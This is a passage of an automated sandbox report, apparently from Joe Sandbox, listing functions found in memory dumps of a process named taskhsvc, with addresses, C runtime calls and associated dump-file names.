      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231BF4
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231C08
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231C26
      • Part of subcall function 00231AED: strlen.MSVCRT ref: 00231C44
      • Part of subcall function 00231AED: __stack_chk_fail.LIBSSP-0 ref: 00231D14
      • Part of subcall function 00326769: __stack_chk_fail.LIBSSP-0 ref: 003267D4
    • free.MSVCRT ref: 002436C4
    • free.MSVCRT ref: 00243708
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0032587B, Relevance: 4.6, APIs: 3, Instructions: 99
    APIs
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
      • Part of subcall function 003257BB: strlen.MSVCRT ref: 003257D7
      • Part of subcall function 003257BB: __stack_chk_fail.LIBSSP-0 ref: 00325841
    • free.MSVCRT ref: 0032592C
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • _stati64.MSVCRT ref: 00325913
    • __stack_chk_fail.LIBSSP-0 ref: 003259BE
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0032EC9C, Relevance: 4.6, APIs: 3, Instructions: 83
    APIs
    • abort.MSVCRT ref: 0032ED00
    • memset.MSVCRT ref: 0032ED1B
      • Part of subcall function 0032EE71: free.MSVCRT ref: 0032EF2B
      • Part of subcall function 0032EE71: free.MSVCRT ref: 0032EF9C
      • Part of subcall function 0032EE71: __stack_chk_fail.LIBSSP-0 ref: 0032F10C
      • Part of subcall function 0032D7F2: abort.MSVCRT ref: 0032D854
      • Part of subcall function 0032D7F2: abort.MSVCRT ref: 0032D893
      • Part of subcall function 0032D7F2: memcpy.MSVCRT ref: 0032D8AD
      • Part of subcall function 0032D7F2: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001F57C7), ref: 0032D8C0
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 0032BEDA: abort.MSVCRT ref: 0032BF43
      • Part of subcall function 0032BEDA: abort.MSVCRT ref: 0032BFE0
      • Part of subcall function 0032BEDA: __stack_chk_fail.LIBSSP-0 ref: 0032C220
      • Part of subcall function 0032EDE0: free.MSVCRT ref: 0032EE34
      • Part of subcall function 0032EDE0: __stack_chk_fail.LIBSSP-0 ref: 0032EE6A
    • __stack_chk_fail.LIBSSP-0 ref: 0032EDD9
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003255C5, Relevance: 4.6, APIs: 3, Instructions: 73
    APIs
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00312E2F), ref: 00325635
    • _write.MSVCRT ref: 00325691
    • __stack_chk_fail.LIBSSP-0 ref: 003256C2
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001E91DB, Relevance: 4.6, APIs: 3, Instructions: 71
    APIs
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    • abort.MSVCRT ref: 001E9241
    • time.MSVCRT ref: 001E9250
      • Part of subcall function 001E955F: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,???,?,001E91A2), ref: 001E969B
      • Part of subcall function 001E60BF: __stack_chk_fail.LIBSSP-0 ref: 001E60E6
    • __stack_chk_fail.LIBSSP-0 ref: 001E92DE
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0033434A, Relevance: 4.6, APIs: 3, Instructions: 63
    APIs
    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DEE90), ref: 003343B0
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 00334024
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 0033407F
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 003340C1
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 0033411F
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 003341E9
      • Part of subcall function 00333FC6: __stack_chk_fail.LIBSSP-0 ref: 0033422C
    • memcpy.MSVCRT ref: 00334405
    • __stack_chk_fail.LIBSSP-0 ref: 00334423
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00325C4C, Relevance: 4.5, APIs: 3, Instructions: 47
    APIs
    • strchr.MSVCRT ref: 00325C82
      • Part of subcall function 00323938: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FF97), ref: 00323967
      • Part of subcall function 00323938: __stack_chk_fail.LIBSSP-0 ref: 003239A8
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • strlen.MSVCRT ref: 00325CC4
      • Part of subcall function 00326865: __stack_chk_fail.LIBSSP-0 ref: 003268C7
    • __stack_chk_fail.LIBSSP-0 ref: 00325CF3
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
